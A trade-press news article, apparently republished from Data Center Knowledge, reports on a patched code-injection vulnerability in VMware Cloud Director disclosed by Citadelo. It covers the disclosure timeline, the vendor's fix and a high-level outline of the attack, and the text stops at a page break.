VMware Bounces Back from Cloud Director Vulnerability
A newly discovered vulnerability in VMware Cloud Director allows attackers who have compromised one account to spread to all the other accounts in a data center.
Previously marketed as vCloud Director (and before that as vCloud Hybrid Service), VMware Cloud Director is a cloud service-delivery platform widely used to deploy and manage virtual data centers and manage virtual cloud resources.
“VMware is aware of the vulnerability,” Stefanie Cannon, a VMware spokesperson, told Data Center Knowledge.
This article by Maria Korolov originally appeared on Channel Futures’ sister site, Data Center Knowledge. |
VMware issued a security advisory to its customers in late May, she explained, but declined to comment further. “This is our public statement on the issue,” she said.
The good news is that VMware has released an upgrade to its software that fixes the problem. The company also offered a set of workarounds for cases where the Cloud Director software can’t be upgraded. Furthermore, it’s good news that only a couple of thousand public-facing servers are vulnerable. So says Tomas Zatko, CEO at Slovak Republic-based Citadelo, the company that discovered the vulnerability.
The bad news is that a server running VMware Cloud Director doesn’t have to be exposed to the internet for the hackers to attack it, and there probably will be companies that don’t react fast enough to fix the problem before the attackers find them.
Zatko told Data Center Knowledge that his company reached out to as many companies as they could to tell them about the problem.
“We feel responsible to warn as many people as possible,” he said.
How It Works
Here’s how the attack works. A malicious hacker uses compromised credentials to log into a VMware Cloud Director management console. Then they use code injection to break out of the application to the underlying infrastructure.
“Then they can do anything,” said Zatko. “They can delete other databases or other virtual machines, copy data, modify data. It’s possible for them to do it in a very loud way, so it’s easy to find them out, or they can do it in a stealthy way. Without a proper security monitoring system and incident response processes, it could be unnoted for a very long time.”
Attackers can also see password hashes for other customers on the system and give themselves system administrator privileges. Then they can change the login page for the Cloud Director in order to capture other login credentials, and gather customer information such as names and email addresses.
VMware calls this an “important” vulnerability, with a CVSSv3 rating of up to 8.8 — 10 being the most critical.
Citadelo discovered the vulnerability in April, Zatko said, and reported it to VMware on April 1. It took the company just a couple of days to confirm that it was a real problem.
“Since it was the first of April, they probably thought we were joking, but we were not,” Zatko said.
Citadelo posted the results of its research on June 1, after VMware released the fix and notified its customers.
According to Zatko, vulnerabilities such as this can bring in hundreds of thousands of dollars on the black market if they are discovered by malicious actors and sold before anyone else knows about them. But he hasn’t seen any evidence that this vulnerability has been used in the wild.
Free Trial Offers Risky
Zatko warned that data centers offering hosting to third parties are particularly vulnerable to …
- Page 1
- Page 2